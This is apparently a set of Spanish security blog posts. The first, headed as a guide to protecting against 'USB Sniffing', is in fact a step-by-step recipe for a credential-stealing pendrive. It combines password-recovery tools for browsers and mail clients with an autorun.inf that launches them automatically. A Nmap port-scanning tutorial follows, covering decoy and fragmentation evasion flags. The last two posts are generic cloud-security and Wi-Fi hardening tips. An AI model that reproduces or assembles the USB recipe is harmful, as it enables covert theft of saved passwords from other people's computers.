Como protegerse de “USB Sniffing”

Como todos sabemos muy bien los Pendrives o USB Drives los utilizamos para transferir datos y demás. ¿Alguna ves pensaron que su pendrive puede capturar todas la contraseñas y datos importantes de una computadora?. Si la respuesta es no, entonces debemos hacer algo para evitar el robo de datos importantes y contraseñas y USB Sniffing. A continuación le mostramos como un usuario cualquiera (Hacker) puede robar sus datos confidenciales.

Las personas utilizamos diferentes navegadores, diferentes programas de chat, y existe una opción en todos estos programas para “guardar contraseñas”, entonces la próxima vez que querramos acceder no tendremos que introducir la contraseña de nuevo.

Como sabemos MS Windows almacena las contraseñas, incluyendo Yahoo, Hotmail, AOL, etc, por lo que un atacante puede interceptar las contraseñas de su computadora vis USB. La siguiente herramienta puede ser utilizada para realizar esto.

  • MessPass solo se puede utilizar para recuperar contraseñas de la sección actual de usuario en el equipo local, y solo funciona si elegimos la opción “recordar contraseña” en alguno de los programas anteriores (Yahoo, AOL, Windows Messenger, Google Talk, etc). Esta aplicación no sirve para obtener contraseñas de otros usuarios.
  • MailPass es una pequeña herramienta de recuperación de contraseña, que revela las contraseñas y otros detalles de cuentas de clientes de correo electrónico (Outlook Express, Yahoo Mail, GMail Notifier, Thunderbird, etc)
  • IE PassView es una utilidad de administración de contraseñas que revela las contraseñas almacenadas por Internet Explorer (Navegador Web)
  • Protected Storage PassView es una pequeña herramienta que revela las contraseñas almacenadas en la computadora por Internet Explorer, Outlook Express y MSN Explorer.
  • PasswordFox es una pequeña utilidad de recuperación de contraseñas que nos permitirá ver los nombres de usuario y contraseñas almacenadas por el navegador Firefox

Descarga las 5 herramientas, extraerlas y copiar solo los archivos ejecutables (.exe) en el Pendrive USB.

Haz Click  Aquí para descargar un programa y ponerlo en la misma carpeta del Pendrive.

Crear un archivo de block de notas y escribir:

[autorun]

open=eh.exe

y guardarlo como autorun.inf

Ahora el USB Sniffer esta listo para usar.

Escaneo de Puertos – Tutorial Nmap

Este es uno de tantos artículos que publicaré que trataran el tema de ethical hacking/pruebas de penetración, uno de los aspectos importantes de estas actividades es el escaneo de puertos.

En este articulo hablaremos sobre los aspectos prácticos de Nmap, la forma de realizar un escaneo  rápido para saber que puertos están abiertos y que servicios corriendo en la maquina objetivo.

Nmap fue originalmente una herramienta de linea de comandos que fue desarrollada únicamente para sistemas operativos basados en UNIX/Linux pero actualmente cuenta con una versión disponible para Windows y es muy fácil de utilizar.

Podemos descargar el instalador de Nmap para Windows o desde una terminal de Linux (Linux basados en Debian) simplemente tipear:

skywalker@skywalker:~$ sudo apt-get install nmap

Ok!, ahora vamos a empezar con un escaneo simple, para obtener ayuda sobre nmap

skywalker@skywalker:~$ nmap –help

Para un escaneo  rápido y simple

skywalker@skywalker:~$ nmap 192.168.1.1

Starting Nmap 4.53 ( http://insecure.org ) at 2011-12-21 15:36 ART

Interesting ports on 192.168.1.1:

Not shown: 1710 closed ports

PORT STATE SERVICE

23/tcp open telnet

53/tcp open domain

80/tcp open http

443/tcp open https

Nmap done: 1 IP address (1 host up) scanned in 14.723 seconds

Es este un escaneo simple? Si, es un simple escaneo que le permitirá saber sobre los puertos abiertos en cualquier maquina, ahora si quiere escanear una red completa lo que tiene que tipear esto con la subred:

skywalker@skywalker:~$ nmap 192.168.1./24

o

skywalker@skywalker:~$ nmap 192.168.1.*

 

Nmap – Opciones Interesantes

  • -f fragmenta los paquetes
  • -D lanza un señuelo para ocultar los escaneos
  • -I IDENT Scan – encuentra los propietarios de los procesos (en Sistemas Unix)
  • -b FTP Bounce

Tipos de Escaneo de Puertos

  • TCP Connect scan
  • TCP SYN scan
  • TCP FIN scan
  • TCP Xmas Tree scan (FIN, URG, and PUSH)
  • TCP Null scan
  • TCP ACK scan
  • UDP scan

Nmap trabaja en los tipos de escaneos  básicos como ser:

  • TCP connect() scanning
  • TCP SYN scanning
  • TCP FIN scanning
  • Fragmentation scanning
  • TCP reverse ident scanning
  • FTP bounce attack
  • UDP ICMP port unreachable scanning
  • UDP recvfrom() and write() scanning
  • ICMP echo scanning

 

La detección del Sistema Operativo o OS fingerprinting es una parte importante de un test de penetración ya que nos permite saber sobre que sistema operativo esta corriendo el equipo objetivo, para poder lanzar un exploit apropiado para este sistema. Nmap ofrece una opción que nos permite saber que sistema operativo esta corriendo, aunque también se puede averiguar mediante el uso de la técnica de “banner grabbing”. Utilizamos -O para identificar el sistema operativo:

skywalker@skywalker:~$ nmap -O 192.168.1.5

Nota: Para utilizar OS fingerprinting se requieren privilegios “root”

Para finalizar les dejo un Cheatsheet de Nmap en Español: Descargar

Continuara….

 

 

.

Seguridad en Cloud Computing – 10 Factores a tener en cuenta.

La tecnología está apostando cada día más por la nube, tanto para gestión como para almacenamiento y ello implica tener en cuenta nuevos riesgos. Si quieres estar seguro a la hora de utilizar aplicaciones y servicios en la nube voy a enumerar una serie de 10 factores a tener en cuenta para minimizar riesgos:

1 – No todas las nubes son iguales. Aunque el concepto es similar, no todas las nubes y servicios concebidos para la nube están diseñados y desarrollados de la misma forma. Es muy recomendable analizar todos los detalles de cualquier propuesta de un proveedor.

2 – Conoce dónde está y cómo es tu cloud. La nube no es etérea, sino que está ubicada en un sitio físico. Saber dónde está, poder acceder a ella o conocer a la gente que está detrás de la gestión evita muchos sustos en el futuro y facilita muchas de las operaciones del día a día. Es importante ofrecer a los clientes un entorno de cloud basado en un datacenter que cuenta con las máximas medidas de seguridad lógicas y físicas.

3 – La seguridad es un requisito, no un añadido. En cuestiones tan sensibles como la salvaguardia de documentación crítica de la empresa, resulta obvio que la seguridad no es una funcionalidad extra a añadir y negociar, sino que por defecto, un buen servicio en la nube debe garantizar el control, gestión y acceso a los datos y aplicaciones bajo estrictas normas de seguridad y acorde a los permisos establecidos por el cliente para interferir en su entorno cloud o en los diferentes niveles de opciones que haya configurado

4 – Una buena seguridad cloud obliga a una buena seguridad in house. No hay que olvidar que en los proyectos de infraestructura y de servicios cloud, el compromiso de seguridad debe de ser doble. No tiene sentido exigir al proveedor entornos seguros de acceso y trabajo y descuidar las políticas internas de seguridad de la empresa.

5 – Las personas siguen siendo un elemento crítico. Las tecnologías hacen el trabajo, pero el diseño y aplicación de las medidas de seguridad las hacen las personas. Las economías de escala permiten a los proveedores de servicios en la nube contar con auténticos expertos de seguridad que aportan mucho valor y experiencia, sobre todo, teniendo en cuenta que históricamente muchos de los fallos de seguridad son por errores humanos.

6 – Recuerda que la seguridad es multiplataforma. El acceso a la nube es ubicuo y multiplataforma. Según las necesidades de cada empleado o departamento accederá a una hora u otra, desde una red fija o una red pública, o desde un dispositivo fijo o móvil. Una buena política de seguridad no debe de descuidar ninguna de estas vías y proponer siempre la existencia de dos redes separadas, aquella que tiene conexión con el exterior, dotada de direccionamiento IP público, y una red privada con direccionamiento privado que es de uso exclusivamente interno.

7 – Apuesta por estándares de mercado. Siempre es más sencillo trabajar con tecnologías y productos estándares del mercado que acotarse a desarrollos muy específicos o de nicho. La migración e integración de equipos, o incluso la replicación de entornos y sistemas será más rápida y sencilla trabajando con estándares de mercado.

8 – Revisa el cumplimiento legal. Un buen proveedor de cloud no sólo debe ofrecer las máximas garantías de seguridad, sino que debe cumplir con las normativas legales en materia de protección de datos, para salvaguardar la confidencialidad y la seguridad de la información y que datos críticos de la compañía no circulen de un país a otro. Por eso es importante contar con personal cualificado que monitorice cualquier incidencia y que notifique y solucione en tiempo real cualquier infracción de seguridad.

9 – Exige garantías de alta disponibilidad y redundancia. Contar con nubes redundantes (datacenters en diversas localizaciones) no sólo garantiza la disponibilidad permanente del servicio en cuestiones de red, almacenamiento y nodos de computación, sino que añade un grado extra de seguridad a la hora de garantizar la pérdida de datos ante desastres.

10 – En seguridad y en cloud no te la juegues. En realidad las amenazas de seguridad en los entornos en la nube no son diferentes a los que existen en el modelo tradicional. Lo que sí que resulta crítico es la confianza y credibilidad que puede aportar una empresa un proveedor de este tipo de soluciones.

Hay que tener en cuenta que la empresa está exponiendo información sensible a un tercero por lo que hay que tener absoluta garantía de que tanto en entornos de cloud pública, como privada o mixta se garantiza la gestión y administración de permisos y accesos; la seguridad física, lógica y monitorización 24 horas; el cumplimiento de la legislación para salvaguardar la confidencialidad y la seguridad de la información; y la garantía de disponibilidad de servicio.

.

6 Consejos para proteger una Red Wireless

La seguridad es un punto clave de la red, bien esta sea cableada o wireless, tenemos que asegurar la red para que usuarios no habilitados entren en la misma.
La importancia de nuestros datos no es una verdad oculta, hoy en día las redes wireless se utilizan en los negocios, aunque también los usuarios comunes también utilizan “WiFi” en sus casas.

A continuación se presentan los consejos de algunos consejos efectivos para asegurar su red wireless.

Cambiar la contraseña “default” de administrador

El fabricante nos proporciona un router o punto de acceso (AP) para conectarnos a nuestra red, normalmente cuando el fabricante hace estos dispositivos crean un valor predeterminado para nombre de usuario (username) y contraseña (password) en estos dispositivos. Cuando iniciamos sesión en el panel de administración web del dispositivo mediante el uso de este usuario y contraseña podemos cambiar todos los parámetros de configuración del router. Por lo que es importante cambiar el valor por defecto del usuario y contraseña. Podemos acceder al panel de administración web del router introduciendo la IP del router (Gateway IP), normalmente 192.168.1.1 o 10.0.0.1

Filtros de Dirección MAC

MAC (Media Access Control o Control de Acceso al Medio) es la dirección física o de hardware de la maquina o dispositivo (router, computadora, ap, etc).

El Router o Access Point hace un seguimiento de la MAC de los dispositivos, este identificador  único ayuda al router a determinar que dispositivo se conecta a este vía wireless. Muchos fabricantes ofrecen una opción a los usuarios para filtrar las direcciones MAC, lo que significa restringir el acceso a otras direcciones MAC y permitir solamente que solo unos pocos (o a un solo host) conectarse a la red.

Uso de IP Estática

Hoy en día la gente utiliza un servidor DHCP o algún otro mecanismo de dirección IP Dinámica, para asegurar la red wireless o si no queremos tener problemas de ancho de banda, utilizaremos direcciones IP Estáticas. Asignar IP(s) solamente a los hosts de confianza

HTTPS, Firewall y Acceso Remoto

HTTPS significa que la conexión es segura (ya hemos hablado de esto antes), asegurémonos de que HTTPS y el Firewall  estén habilitados en nuestro Router. Un Firewall bloquea la conexión a los puertos que normalmente no están siendo usados.

Deshabilitar la difusión SSID (SSID Broadcasting)

El SSID o identificador de servicio es el nombre de la red wireless, debemos cambiar el nombre SSID predeterminado y deshabilitar la difusión de SSID. Al conocer el nombre de red (predeterminado) o el nombre del dispositivo puede encontrar los datos predeterminados del router en el sitio web del fabricante.

Activar la Encriptación

La Encriptación o Criptografía realmente nos ayudara a asegurar la red wireless, todos los equipos WiFi (AP o Router) soportan algún tipo de técnica de encriptación, debemos asegurarnos de que este activado. Es muy recomendable utilizar la encriptación WPA2, ya que otras técnicas son vulnerables y pueden ser crackeadas o hackeadas.